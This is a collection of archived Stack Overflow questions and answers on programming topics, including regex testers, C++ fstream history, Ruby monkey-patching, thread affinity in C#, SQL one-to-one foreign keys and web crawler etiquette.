CTP are available and it looks promising. Basically it allows you to do this: public static int Divide(int x, int y) requires y != 0 otherwise ArgumentException; { } or public static int Subtract(int x, int y) requires x > y; ensures result > y; { return x - y; } It also provides another features like Notnull types. It's build on top of the .NET Framework 2.0 and it's fully compatible. The syntaxt, as you may see, is C#. A: Slightly off-topic, but one feature of findbugs that I think is very useful is to be able to annotate the parameters of methods to describe which parameters should not be passed a null value. Using static analysis of your code, findbugs can then point out locations where the method is called with a potentially null value. This has two advantages: * *The annotation describes your intention for how the method should be called, aiding documentation *FindBugs can point to potential problem callers of the method, allowing you to track down potential bugs. Only useful when you have access to the code that calls your methods, but that is usually the case. A: Since off-topic seems to have become the topic, Scala takes an interesting approach to this. All types are assumed to be not null, unless you explicity wrap it in an Option to indicate that it might be null. So: // allocate null var name : Option[String] name = None // allocate a value name = Any["Hello"] // print the value if we can name match { Any[x] => print x _ => print "Nothing at all" } A: Thwrowing C# ArgumentException, or Java IllegalArgumentException right at the beginning of the method looks to me as the clearest of solutions. One should always be careful with Runtime Exceptions - exceptions that are not declared on the method signature. Since the compiler doesn't enforce you to catch these it's really easy to forget about them. Make sure you have some kind of a "catch all" exception handling to prevent the software to halt abruptly. That's the most important part of your user experience. A: The best way to handle this really would be the use of exceptions. Ultimately, the asserts are going to end up giving a similar experience to the end user but provide no way for the developer calling your code to handle the situation before showing an exception to the end user. Ultimatley, you want to ensure that you test for invalid inputs as early as possible (especially in public facing code) and provide the appropriate exceptions that the calling code can catch. A: In a Java way, assuming the null comes from a programming error (ie. should never go outside the testing phase), then leave the system throw it, or if there are side-effects reaching that point, check for null at the beginning and throw either IllegalArgumentException or NullPointerException. If the null could come from an actual exceptional case but you don't want to use a checked exception for that, then you definitely want to go the IllegalArgumentException route at the beginning of the method.
{ "language": "en", "url": "https://stackoverflow.com/questions/32280", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "20" }
Q: How can test I regular expressions using multiple RE engines? How can I test the same regex against different regular expression engines? A: Here are some for the Mac: (Note: don't judge the tools by their websites) * *RegExhibit - My Favorite, powerful and easy *Reggy - Simple and Clean *RegexWidget - A Dashboard Widget for quick testing A: If you are an Emacs user, the command re-builder lets you type an Emacs regex and shows on the fly the matching strings in the current buffer, with colors to mark groups. It's free as Emacs. A: The most powerful free online regexp testing tool is by far http://regex101.com/ - lets you select the RE engine (PCRE, JavaScript, Python), has a debugger, colorizes the matches, explains the regexp on the fly, can create permalinks to the regex playground. Other online tools: * *http://www.rexv.org/ - supports PHP and Perl PCRE, Posix, Python, JavaScript, and Node.js *http://refiddle.com/ - Inspired by jsfiddle, but for regular expressions. Supports JavaScript, Ruby and .NET expressions. *http://regexpal.com/ - powered by the XRegExp JavaScript library *http://www.rubular.com/ - Ruby-based *Perl Regex Tutor - uses PCRE Windows desktop tools: * *The Regex Coach - free Windows application *RegexBuddy recommended by most, costs US$ 39.95 Jeff Atwood [wrote about regular expressions]( post:). Other tools recommended by SO users include: * *http://www.txt2re.com/ Online free tool to generate regular expressions for multiple language (@palmsey another thread) *The Added Bytes Regular Expressions Cheat Sheet (@GateKiller another thread) *http://regexhero.net/ - The Online .NET Regular Expression Tester. Not free. A: Rubular is free, easy to use and looks nice. A: RegexBuddy is a weapon of choice A: I use the excellent and free Rad Software Regular Expression Designer. If you just want to write a regular expression, have a little help with the syntax and test the RE's matching and replacing then this fairly light-footprint tool is ideal. A: couple of eclipse plugins for those using eclipse, http://www.brosinski.com/regex/ http://www.bastian-bergerhoff.com/eclipse/features/web/QuickREx/toc.html A: Kodos of course. Cause it's Pythonic. ;) A: RegexBuddy is great!!! A: I agree on RegExBuddy, but if you want free or when I'm working somewhere and not on my own system RegExr is a great online (Flash) tool that has lots of pre-built regex segments to work with and does real-time pattern matching for your testing. A: In the standard Python installation there is a "Tools/scripts" directory containing redemo.py. This creates an interactive Tkinter window in which you can experiment with regexs. A: In the past I preferred The Regex Coach for its simplistic layout, instantaneous highlighting and its price (free). Every once in awhile though I run into an issue with it when trying to test .NET regular expressions. For that, it turns out, it's better to use a tool that actually uses the .NET regular expression engine. That was my whole reason to build Regex Hero last year. It runs in Silverlight, and as such, runs off of the .NET Regex Class library directly. A: RegexBuddy A: I use Expresso (www.ultrapico.com). It has a lot of nice features for the developer. The Regulator used to be my favorite, but it hasn't been updated in so long and I constantly ran into crashes with complicated RegExs. A: Regexbuddy does all this. http://www.regexbuddy.com/ A: see the accepted answer to this question: Learning Regular Expressions A: I'll add to the vote of Reggy for the Mac, gonna try out some of the other ones that Joseph suggested and upvote that post tomorrow when my limit gets reset. A: for online: http://regexpal.com/ for desktop: The Regex Coach A: +1 For Regex Coach here. Free and does the job really well. http://www.weitz.de/regex-coach/ A: I am still a big The Regulator fan. There are some stability problems but these can be fixed by disableing the Intellisense. It gets mad with some expressions and typos in building an expression. Would love it if Roy Osherove updated, but looks like he is busy with other things. A: I like to use this online one: http://www.cuneytyilmaz.com/prog/jrx/ Of course, it'll be javascript regexp, but I've never yet done anything clever enough to notice the difference. A: How much is your time worth? Pay the $40 and get RegexBuddy. I did, and I even upgraded from 2.x version to 3.x. It has paid for itself many times over. A: I personally like the Regular Expression Tester. It's a free firefox plugin, so always on! A: Also this regex plugin can be useful for eclipse and idea users. A: I like http://regexhero.net/tester/ a lot A: Check out Regex Master which is free and open source regular expression tester A: This regex tester able to test javascript, php and python http://www.piliapp.com/regex-tester/ A: RegExBuddy so far I concur with and endorse. A: RegExr for testing with the Actionscript 3 (whichever standard that may be) A: http://rgx-extract-replace.appspot.com has the functionality to enlist the captured regex groups formatted in columns and optionally can replace the matched patterns in the input text.
{ "language": "en", "url": "https://stackoverflow.com/questions/32282", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "85" }
Q: Why don't the std::fstream classes take a std::string? This isn't a design question, really, though it may seem like it. (Well, okay, it's kind of a design question). What I'm wondering is why the C++ std::fstream classes don't take a std::string in their constructor or open methods. Everyone loves code examples so: #include <iostream> #include <fstream> #include <string> int main() { std::string filename = "testfile"; std::ifstream fin; fin.open(filename.c_str()); // Works just fine. fin.close(); //fin.open(filename); // Error: no such method. //fin.close(); } This gets me all the time when working with files. Surely the C++ library would use std::string wherever possible? A: The stream IO library has been added to the standard C++ library before the STL. In order to not break backward compatibility, it has been decided to avoid modifying the IO library when the STL was added, even if that meant some issues like the one you raise. A: @ Bernard: Monoliths "Unstrung." "All for one, and one for all" may work for Musketeers, but it doesn't work nearly as well for class designers. Here's an example that is not altogether exemplary, and it illustrates just how badly you can go wrong when design turns into overdesign. The example is, unfortunately, taken from a standard library near you... ~ http://www.gotw.ca/gotw/084.htm A: By taking a C string the C++03 std::fstream class reduced dependency on the std::string class. In C++11, however, the std::fstream class does allow passing a std::string for its constructor parameter. Now, you may wonder why isn't there a transparent conversion from a std:string to a C string, so a class that expects a C string could still take a std::string just like a class that expects a std::string can take a C string. The reason is that this would cause a conversion cycle, which in turn may lead to problems. For example, suppose std::string would be convertible to a C string so that you could use std::strings with fstreams. Suppose also that C string are convertible to std::strings as is the state in the current standard. Now, consider the following: void f(std::string str1, std::string str2); void f(char* cstr1, char* cstr2); void g() { char* cstr = "abc"; std::string str = "def"; f(cstr, str); // ERROR: ambiguous } Because you can convert either way between a std::string and a C string the call to f() could resolve to either of the two f() alternatives, and is thus ambiguous. The solution is to break the conversion cycle by making one conversion direction explicit, which is what the STL chose to do with c_str(). A: It is inconsequential, that is true. What do you mean by std::string's interface being large? What does large mean, in this context - lots of method calls? I'm not being facetious, I am actually interested. It has more methods than it really needs, and its behaviour of using integral offsets rather than iterators is a bit iffy (as it's contrary to the way the rest of the library works). The real issue I think is that the C++ library has three parts; it has the old C library, it has the STL, and it has strings-and-iostreams. Though some efforts were made to bridge the different parts (e.g. the addition of overloads to the C library, because C++ supports overloading; the addition of iterators to basic_string; the addition of the iostream iterator adaptors), there are a lot of inconsistencies when you look at the detail. For example, basic_string includes methods that are unnecessary duplicates of standard algorithms; the various find methods, could probably be safely removed. Another example: locales use raw pointers instead of iterators. A: There are several places where the C++ standard committee did not really optimize the interaction between facilities in the standard library. std::string and its use in the library is one of these. One other example is std::swap. Many containers have a swap member function, but no overload of std::swap is supplied. The same goes for std::sort. I hope all these small things will be fixed in the upcoming standard. A: Maybe it's a consolation: all fstream's have gotten an open(string const &, ...) next to the open(char const *, ...) in the working draft of the C++0x standard. (see e.g. 27.8.1.6 for the basic_ifstream declaration) So when it gets finalised and implemented, it won't get you anymore :) A: C++ grew up on smaller machines than the monsters we write code for today. Back when iostream was new many developers really cared about code size (they had to fit their entire program and data into several hundred KB). Therefore, many didn't want to pull in the "big" C++ string library. Many didn't even use the iostream library for the same reasons, code size. We didn't have thousands of megabytes of RAM to throw around like we do today. We usually didn't have function level linking so we were at the mercy of the developer of the library to use a lot of separate object files or else pull in tons of uncalled code. All of this FUD made developers steer away from std::string. Back then I avoided std::string too. "Too bloated", "called malloc too often", etc. Foolishly using stack-based buffers for strings, then adding all kinds of tedious code to make sure it doesn't overrun. A: Is there any class in STL that takes a string... I dont think so (couldnt find any in my quick search). So it's probably some design decision, that no class in STL should be dependent on any other STL class (that is not directly needed for functionality). A: I believe that this has been thought about and was done to avoid the dependency; i.e. #include <fstream> should not force one to #include <string>. To be honest, this seems like quite an inconsequential issue. A better question would be, why is std::string's interface so large? A: Nowadays you can solve this problem very easily: add -std=c++11 to your CFLAGS.
{ "language": "en", "url": "https://stackoverflow.com/questions/32332", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "36" }
Q: How can I program defensively in Ruby? Here's a perfect example of the problem: Classifier gem breaks Rails. ** Original question: ** One thing that concerns me as a security professional is that Ruby doesn't have a parallel of Java's package-privacy. That is, this isn't valid Ruby: public module Foo public module Bar # factory method for new Bar implementations def self.new(...) SimpleBarImplementation.new(...) end def baz raise NotImplementedError.new('Implementing Classes MUST redefine #baz') end end private class SimpleBarImplementation include Bar def baz ... end end end It'd be really nice to be able to prevent monkey-patching of Foo::BarImpl. That way, people who rely on the library know that nobody has messed with it. Imagine if somebody changed the implementation of MD5 or SHA1 on you! I can call freeze on these classes, but I have to do it on a class-by-class basis, and other scripts might modify them before I finish securing my application if I'm not very careful about load order. Java provides lots of other tools for defensive programming, many of which are not possible in Ruby. (See Josh Bloch's book for a good list.) Is this really a concern? Should I just stop complaining and use Ruby for lightweight things and not hope for "enterprise-ready" solutions? (And no, core classes are not frozen by default in Ruby. See below:) require 'md5' # => true MD5.frozen? # => false A: I don't think this is a concern. Yes, the mythical "somebody" can replace the implementation of MD5 with something insecure. But in order to do that, the mythical somebody must actually be able to get his code into the Ruby process. And if he can do that, then he presumably could also inject his code into a Java process and e.g. rewrite the bytecode for the MD5 operation. Or just intercept the keypresses and not actually bother with fiddling with the cryptography code at all. One of the typical concerns is: I'm writing this awesome library, which is supposed to be used like so: require 'awesome' # Do something awesome. But what if someone uses it like so: require 'evil_cracker_lib_from_russian_pr0n_site' # Overrides crypto functions and sends all data to mafia require 'awesome' # Now everything is insecure because awesome lib uses # cracker lib instead of builtin And the simple solution is: don't do that! Educate your users that they shouldn't run untrusted code they downloaded from obscure sources in their security critical applications. And if they do, they probably deserve it. To come back to your Java example: it's true that in Java you can make your crypto code private and final and what not. However, someone can still replace your crypto implementation! In fact, someone actually did: many open-source Java implementations use OpenSSL to implement their cryptographic routines. And, as you probably know, Debian shipped with a broken, insecure version of OpenSSL for years. So, all Java programs running on Debian for the past couple of years actually did run with insecure crypto! A: Java provides lots of other tools for defensive programming Initially I thought you were talking about normal defensive programming, wherein the idea is to defend the program (or your subset of it, or your single function) from invalid data input. That's a great thing, and I encourage everyone to go read that article. However it seems you are actually talking about "defending your code from other programmers." In my opinion, this is a completely pointless goal, as no matter what you do, a malicious programmer can always run your program under a debugger, or use dll injection or any number of other techniques. If you are merely seeking to protect your code from incompetent co-workers, this is ridiculous. Educate your co-workers, or get better co-workers. At any rate, if such things are of great concern to you, ruby is not the programming language for you. Monkeypatching is in there by design, and to disallow it goes against the whole point of the feature. A: I guess Ruby has that a feature - valued more over it being a security issue. Ducktyping too. E.g. I can add my own methods to the Ruby String class rather than extending or wrapping it. A: "Educate your co-workers, or get better co-workers" works great for a small software startup, and it works great for the big guns like Google and Amazon. It's ridiculous to think that every lowly developer contracted in for some small medical charts application in a doctor's office in a minor city. I'm not saying we should build for the lowest common denominator, but we have to be realistic that there are lots of mediocre programmers out there who will pull in any library that gets the job done, paying no attention to security. How could they pay attention to security? Maybe the took an algorithms and data structures class. Maybe they took a compilers class. They almost certainly didn't take an encryption protocols class. They definitely haven't all read Schneier or any of the others out there who practically have to beg and plead with even very good programmers to consider security when building software. I'm not worried about this: require 'evil_cracker_lib_from_russian_pr0n_site' require 'awesome' I'm worried about awesome requiring foobar and fazbot, and foobar requiring has_gumption, and ... eventually two of these conflict in some obscure way that undoes an important security aspect. One important security principle is "defense in depth" -- adding these extra layers of security help you from accidentally shooting yourself in the foot. They can't completely prevent it; nothing can. But they help. A: Check out Immutable by Garry Dolley. You can prevent redefinition of individual methods. A: If monkey patching is your concen, you can use the Immutable module (or one of similar function). Immutable A: You could take a look at Why the Lucky Stiff's "Sandbox"project, which you can use if you worry about potentially running unsafe code. http://code.whytheluckystiff.net/sandbox/ An example (online TicTacToe): http://www.elctech.com/blog/safely-exposing-your-app-to-a-ruby-sandbox A: Raganwald has a recent post about this. In the end, he builds the following: class Module def anonymous_module(&block) self.send :include, Module.new(&block) end end class Acronym anonymous_module do fu = lambda { 'fu' } bar = lambda { 'bar' } define_method :fubar do fu.call + bar.call end end end That exposes fubar as a public method on Acronyms, but keeps the internal guts (fu and bar) private and hides helper module from outside view. A: If someone monkeypatched an object or a module, then you need to look at 2 cases: He added a new method. If he is the only one adding this meyhod (which is very likely), then no problems arise. If he is not the only one, you need to see if both methods do the same and tell the library developer about this severe problem. If they change a method, you should start to research why the method was changed. Did they change it due to some edge case behaviour or did they actually fix a bug? especially in the latter case, the monkeypatch is a god thing, because it fixes a bug in many places. Besides that, you are using a very dynamic language with the assumption that programmers use this freedom in a sane way. The only way to remove this assumption is not to use a dynamic language.
{ "language": "en", "url": "https://stackoverflow.com/questions/32333", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "5" }
Q: Are there similar tools to Clone Detective for other languages/IDEs? I just saw Clone Detective linked on YCombinator news, and the idea heavily appeals to me. It seems like it would be useful for many languages, not just C#, but I haven't seen anything similar elsewhere. Edit: For those who don't want to follow the link, Clone Detective scans the codebase for duplicate code that may warrant refactoring to minimize duplication. A: Java has a few - some of the most popular static analysis tools have this built in along with many other useful rules. Ones I have used, in the (purely subjective) order that I was happiest with: * *PMD - comes with CPD - their copy and paste detector *Checkstyle - specific rules to look for duplicate code *Findbugs - the daddy of all Java static analysis tools. Includes duplicate code detection, along with just about anything else that you can think of, but quite resource intensive There are some nice IDE plugins for all of these and many other reporting tools (for example, you can see results on a Hudson continuos build server, or your project's Maven site) A: The IntelliJ IDE (Java, Scala, Ruby,...) has a Locate Duplicate... tool. Usefull indeed !
{ "language": "en", "url": "https://stackoverflow.com/questions/32338", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: How do I list all Entries with a certain tag in Wordpress? I may just be missing this functionality, but does anyone know if there is a widget available: I need to list the subject for all the entries that are associated with a given tag. For example: I have 5 articles tagged with "Tutorial", I'd like to see a list as follows: * *Tutorial 1: Installing the app *Tutorial 2: Customizing *Tutorial 3: Advanced edits *Tutorial 4: User managment Does functionality like this exists in wordpress allready? A: If you are comfortable with hacking WP you can try adding to your sidebar with wp_list_pages, http://codex.wordpress.org/Template_Tags/wp_list_pages. Or there are plug-ins like Simple-Tags(http://wordpress.org/extend/plugins/simple-tags/) that help you manage your tags. The nice thing about WordPress is there are lots of plug-ins available that can add functionality that the base app does not ahve, a quick search for plug-ins for tabs(http://wordpress.org/extend/plugins/search.php?q=tag) returned quite a list, sure it's a lot to dig through but that also helps you see what is available. A: So i found an article on using custom queries. I modified the script to pull a specific tag, in this case "Open Source". <?php $querystr = "SELECT wposts.* FROM $wpdb->posts wposts, $wpdb->terms wterms, $wpdb->term_relationships wterm_relationships, $wpdb->term_taxonomy wterm_taxonomy WHERE wterm_relationships.object_id = wposts.ID AND wterm_relationships.term_taxonomy_id = wterm_taxonomy.term_taxonomy_id AND wterms.term_id = wterm_taxonomy.term_id AND wterm_taxonomy.taxonomy = 'post_tag' AND wterms.name = 'Open Source' AND wposts.post_status = 'publish' AND wposts.post_type = 'post' ORDER BY wposts.post_date DESC"; $pageposts = $wpdb->get_results($querystr, OBJECT); ?> <?php if ($pageposts): ?> <?php foreach ($pageposts as $post): ?> <?php setup_postdata($post); ?> <a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title(); ?>"><?php the_title('<li>', '</li>'); ?></a> <?php endforeach; ?> <?php else : ?> <?php endif; ?> If you only want to list pages for one specific tag then this would work. However, say you wanted to give a listing of pages for each tag based on the current articles listed on the page. You might create an array of all the tags using the get_the_tags() function during The Loop and then use that array to dynamically generate the WHERE statement for the query. A: You can easily use get_posts to create an array of posts based on a set of parameters. It retrieves a list of recent posts or posts matching these criteria. In your case, I would like to show how to display your posts under a specific tag ( in your case, Tutorial ) by creating a short code, which can be easily used anywhere later on in your site. In your functions.php function shortcode_tag_t() { $uu_id=get_current_user_id(); $args = array( 'posts_per_page' => 10, 'tag' => 'Tutorial', 'post_type' => 'post', 'post_status' => 'publish' ); $posts_array = get_posts( $args ); foreach ( $posts_array as $post ) : setup_postdata( $post ); $url = $post->guid; echo"<li><a href='".$url."'>" .$post->post_title."</a></li>"; endforeach; wp_reset_postdata(); } add_shortcode('your_shortcode_name', shortcode_tag_t ); Now you have a list of 10 posts tagged under Tutorial. Echo the created short code where ever you want to display the list.
{ "language": "en", "url": "https://stackoverflow.com/questions/32341", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "0" }
Q: How do I spawn threads on different CPU cores? Let's say I had a program in C# that did something computationally expensive, like encoding a list of WAV files into MP3s. Ordinarily I would encode the files one at a time, but let's say I wanted the program to figure out how many CPU cores I had and spin up an encoding thread on each core. So, when I run the program on a quad core CPU, the program figures out it's a quad core CPU, figures out there are four cores to work with, then spawns four threads for the encoding, each of which is running on its own separate CPU. How would I do this? And would this be any different if the cores were spread out across multiple physical CPUs? As in, if I had a machine with two quad core CPUs on it, are there any special considerations or are the eight cores across the two dies considered equal in Windows? A: In the case of managed threads, the complexity of doing this is a degree greater than that of native threads. This is because CLR threads are not directly tied to a native OS thread. In other words, the CLR can switch a managed thread from native thread to native thread as it sees fit. The function Thread.BeginThreadAffinity is provided to place a managed thread in lock-step with a native OS thread. At that point, you could experiment with using native API's to give the underlying native thread processor affinity. As everyone suggests here, this isn't a very good idea. In fact there is documentation suggesting that threads can receive less processing time if they are restricted to a single processor or core. You can also explore the System.Diagnostics.Process class. There you can find a function to enumerate a process' threads as a collection of ProcessThread objects. This class has methods to set ProcessorAffinity or even set a preferred processor -- not sure what that is. Disclaimer: I've experienced a similar problem where I thought the CPU(s) were under utilized and researched a lot of this stuff; however, based on all that I read, it appeared that is wasn't a very good idea, as evidenced by the comments posted here as well. However, it's still interesting and a learning experience to experiment. A: Don't bother doing that. Instead use the Thread Pool. The thread pool is a mechanism (actually a class) of the framework that you can query for a new thread. When you ask for a new thread it will either give you a new one or enqueue the work until a thread get freed. In that way the framework is in charge on deciding wether it should create more threads or not depending on the number of present CPUs. Edit: In addition, as it has been already mentioned, the OS is in charge of distributing the threads among the different CPUs. A: You can definitely do this by writing the routine inside your program. However you should not try to do it, since the Operating System is the best candidate to manage these stuff. I mean user mode program should not do try to do it. However, sometimes, it can be done (for really advanced user) to achieve the load balancing and even to find out true multi thread multi core problem (data racing/cache coherence...) as different threads would be truly executing on different processor. Having said that, if you still want to achieve we can do it in the following way. I am providing you the pseudo code for(Windows OS), however they could easily be done on Linux as well. #define MAX_CORE 256 processor_mask[MAX_CORE] = {0}; core_number = 0; Call GetLogicalProcessorInformation(); // From Here we calculate the core_number and also we populate the process_mask[] array // which would be used later on to set to run different threads on different CORES. for(j = 0; j < THREAD_POOL_SIZE; j++) Call SetThreadAffinityMask(hThread[j],processor_mask[j]); //hThread is the array of handles of thread. //Now if your number of threads are higher than the actual number of cores, // you can use reset the counters(j) once you reach to the "core_number". After the above routine is called, the threads would always be executing in the following manner: Thread1-> Core1 Thread2-> Core2 Thread3-> Core3 Thread4-> Core4 Thread5-> Core5 Thread6-> Core6 Thread7-> Core7 Thread8-> Core8 Thread9-> Core1 Thread10-> Core2 ............... For more information, please refer to manual/MSDN to know more about these concepts. A: You shouldn't have to worry about doing this yourself. I have multithreaded .NET apps running on dual-quad machines, and no matter how the threads are started, whether via the ThreadPool or manually, I see a nice even distribution of work across all cores. A: Where each thread goes is generally handled by the OS itself...so generate 4 threads on a 4 core system and the OS will decide which cores to run each on, which will usually be 1 thread on each core. A: It is the operating system's job to split threads across different cores, and it will do so when automatically when your threads are using a lot of CPU time. Don't worry about that. As for finding out how many cores your user has, try Environment.ProcessorCount in C#. A: you cannot do this, as only operating system has the privileges to do it. If you will decide it.....then it will be difficult to code applications. Because then you also need to take care for inter-processor communication. critical sections. for each application you have to create you own semaphores or mutex......to which operating system gives a common solution by doing it itself....... A: It is not necessarily as simple as using the thread pool. By default, the thread pool allocates multiple threads for each CPU. Since every thread which gets involved in the work you are doing has a cost (task switching overhead, use of the CPU's very limited L1, L2 and maybe L3 cache, etc...), the optimal number of threads to use is <= the number of available CPU's - unless each thread is requesting services from other machines - such as a highly scalable web service. In some cases, particularly those which involve more hard disk reading and writing than CPU activity, you can actually be better off with 1 thread than multiple threads. For most applications, and certainly for WAV and MP3 encoding, you should limit the number of worker threads to the number of available CPU's. Here is some C# code to find the number of CPU's: int processors = 1; string processorsStr = System.Environment.GetEnvironmentVariable("NUMBER_OF_PROCESSORS"); if (processorsStr != null) processors = int.Parse(processorsStr); Unfortunately, it is not as simple as limiting yourself to the number of CPU's. You also have to take into account the performance of the hard disk controller(s) and disk(s). The only way you can really find the optimal number of threads is trial an error. This is particularly true when you are using hard disks, web services and such. With hard disks, you might be better off not using all four processers on you quad processor CPU. On the other hand, with some web services, you might be better off making 10 or even 100 requests per CPU. A: Although I agree with most of the answers here, I think it's worth it to add a new consideration: Speedstep technology. When running a CPU intensive, single threaded job on a multi-core system, in my case a Xeon E5-2430 with 6 real cores (12 with HT) under windows server 2012, the job got spread out among all the 12 cores, using around 8.33% of each core and never triggering a speed increase. The CPU remained at 1.2 GHz. When I set the thread affinity to a specific core, it used ~100% of that core, causing the CPU to max out at 2.5 GHz, more than doubling the performance. This is the program I used, which just loops increasing a variable. When called with -a, it will set the affinity to core 1. The affinity part was based on this post. using System; using System.Diagnostics; using System.Linq; using System.Runtime.InteropServices; using System.Threading; namespace Esquenta { class Program { private static int numThreads = 1; static bool affinity = false; static void Main(string[] args) { if (args.Contains("-a")) { affinity = true; } if (args.Length < 1 || !int.TryParse(args[0], out numThreads)) { numThreads = 1; } Console.WriteLine("numThreads:" + numThreads); for (int j = 0; j < numThreads; j++) { var param = new ParameterizedThreadStart(EsquentaP); var thread = new Thread(param); thread.Start(j); } } static void EsquentaP(object numero_obj) { int i = 0; DateTime ultimo = DateTime.Now; if(affinity) { Thread.BeginThreadAffinity(); CurrentThread.ProcessorAffinity = new IntPtr(1); } try { while (true) { i++; if (i == int.MaxValue) { i = 0; var lps = int.MaxValue / (DateTime.Now - ultimo).TotalSeconds / 1000000; Console.WriteLine("Thread " + numero_obj + " " + lps.ToString("0.000") + " M loops/s"); ultimo = DateTime.Now; } } } finally { Thread.EndThreadAffinity(); } } [DllImport("kernel32.dll")] public static extern int GetCurrentThreadId(); [DllImport("kernel32.dll")] public static extern int GetCurrentProcessorNumber(); private static ProcessThread CurrentThread { get { int id = GetCurrentThreadId(); return Process.GetCurrentProcess().Threads.Cast<ProcessThread>().Single(x => x.Id == id); } } } } And the results: Processor speed, as shown by Task manager, similar to what CPU-Z reports: A: One of the reasons you should not (as has been said) try to allocated this sort of stuff yourself, is that you just don't have enough information to do it properly, particularly into the future with NUMA, etc. If you have a thread read-to-run, and there's a core idle, the kernel will run your thread, don't worry.
{ "language": "en", "url": "https://stackoverflow.com/questions/32343", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "66" }
Q: 1:1 Foreign Key Constraints How do you specify that a foreign key constraint should be a 1:1 relationship in transact sql? Is declaring the column UNIQUE enough? Below is my existing code.! CREATE TABLE [dbo].MyTable( [MyTablekey] INT IDENTITY(1,1) NOT FOR REPLICATION NOT NULL, [OtherTableKey] INT NOT NULL UNIQUE CONSTRAINT [FK_MyTable_OtherTable] FOREIGN KEY REFERENCES [dbo].[OtherTable]([OtherTableKey]), ... CONSTRAINT [PK_MyTable] PRIMARY KEY CLUSTERED ( [MyTableKey] ASC ) WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY] ) ON [PRIMARY] GO A: A foreign key column with the UNIQUE and NOT NULL constraints that references a UNIQUE, NOT NULL column in another table creates a 1:(0|1) relationship, which is probably what you want. If there was a true 1:1 relationship, every record in the first table would have a corresponding record in the second table and vice-versa. In that case, you would probably just want to make one table (unless you needed some strange storage optimization). A: You could declare the column to be both the primary key and a foreign key. This is a good strategy for "extension" tables that are used to avoid putting nullable columns into the main table. A: @bosnic: You have a table CLIENT that has a 1:1 relationship with table SALES_OFFICE because, for example, the logic of your system says so. What your app logic says, and what your data model say are 2 different things. There is nothing wrong with enforcing that relationship with your business logic code, but it has no place in the data model. Would you really incorporate the data of SALES_OFFICE into CLIENT table? If every CLIENT has a unique SALES_OFFICE, and every SALES_OFFICE has a singular, unique CLIENT - then yes, they should be in the same table. We just need a better name. ;) And if another tables need to relate them selfs with SALES_OFFICE? There's no reason to. Relate your other tables to CLIENT, since CLIENT has a unique SALES_OFFICE. And what about database normalization best practices and patterns? This is normalization. To be fair, SALES_OFFICE and CLIENT is obviously not a 1:1 relationship - it's 1:N. Hopefully, your SALES_OFFICE exists to serve more than 1 client, and will continue to exist (for a while, at least) without any clients. A more realistic example is SALES_OFFICE and ZIP_CODE. A SALES_OFFICE must have exactly 1 ZIP_CODE, and 2 SALES_OFFICEs - even if they have an equivalent ZIP_CODE - do not share the instance of a ZIP_CODE (so, changing the ZIP_CODE of 1 does not impact the other). Wouldn't you agree that ZIP_CODE belongs as a column in SALES_OFFICE? A: Based on your code above, the unique constraint would be enough given that the for every primary key you have in the table, the unique constrained column is also unique. Also, this assumes that in [OtherTable], the [OtherTableKey] column is the primary key of that table. A: If there was a true 1:1 relationship, every record in the first table would have a corresponding record in the second table and vice-versa. In that case, you would probably just want to make one table (unless you needed some strange storage optimization). This is very incorrect. Let me give you an example. You have a table CLIENT that has a 1:1 relationship with table SALES_OFFICE because, for example, the logic of your system says so. Would you really incorporate the data of SALES_OFFICE into CLIENT table? And if another tables need to relate them selfs with SALES_OFFICE? And what about database normalization best practices and patterns? A foreign key column with the UNIQUE and NOT NULL constraints that references a UNIQUE, NOT NULL column in another table creates a 1:(0|1) relationship, which is probably what you want. The first part of your answer is the right answer, without the second part, unless the data in second table is really a kind of information that belongs to first table and never will be used by other tables.
{ "language": "en", "url": "https://stackoverflow.com/questions/32360", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "9" }
Q: Assert action redirected to correct action/route? How do I exercise an action to ensure it redirects to the correct action or route? A: public ActionResult Foo() { return RedirectToAction("Products", "Index"); } [Test] public void foo_redirects_to_products_index() { var controller = new BarController(); var result = controller.Foo() as RedirectToRouteResult; if(result == null) Assert.Fail("should have redirected"); Assert.That(result.RouteData.Values["Controller"], Is.EqualTo("Products")); Assert.That(result.RouteData.Values["Action"], Is.EqualTo("Index")); }
{ "language": "en", "url": "https://stackoverflow.com/questions/32364", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: What are the key considerations when creating a web crawler? I just started thinking about creating/customizing a web crawler today, and know very little about web crawler/robot etiquette. A majority of the writings on etiquette I've found seem old and awkward, so I'd like to get some current (and practical) insights from the web developer community. I want to use a crawler to walk over "the web" for a super simple purpose - "does the markup of site XYZ meet condition ABC?". This raises a lot of questions for me, but I think the two main questions I need to get out of the way first are: * *It feels a little "iffy" from the get go -- is this sort of thing acceptable? *What specific considerations should the crawler take to not upset people? A: Obey robots.txt (and not too aggressive like has been said already). You might want to think about your user-agent string - they're a good place to be up-front about what you're doing and how you can be contacted. A: Besides WillDean's and Einar's good answers, I would really recommend you take a time to read about the meaning of the HTTP response codes, and what your crawler should do when encountering each one, since it will make a big a difference on your performance, and on wether or not you are banned from some sites. Some useful links: HTTP/1.1: Status Code Definitions Aggregator client HTTP tests Wikipedia A: Please be sure to include a URL in your user-agent string that explains who/what/why your robot is crawling. A: Also do not forget to obey the bot meta tags: http://www.w3.org/TR/html4/appendix/notes.html#h-B.4.1.2 Another thing to think about - when spider pages, don't be too hasty deciding things don't exist or have errors. Some pages are offline due to maintenance work or errors that are corrected within a short period. A: All good points, the ones made here. You will also have to deal with dynamically-generated Java and JavaScript links, parameters and session IDs, escaping single and double quotes, failed attempts at relative links (using ../../ to go past the root directory), case sensitivity, frames, redirects, cookies.... I could go on for days, and kinda have. I have a Robots Checklist that covers most of this, and I'm happy answer what I can. You should also think about using open-source robot crawler code, because it gives you a huge leg up on all these issues. I have a page on that as well: open source robot code. Hope that helps! A: I'd say that it is very important to consider how much load you are causing. For instance, if your crawler requests every object of a single site, more or less at once, it might cause load problems for that particular site. In other words, make sure 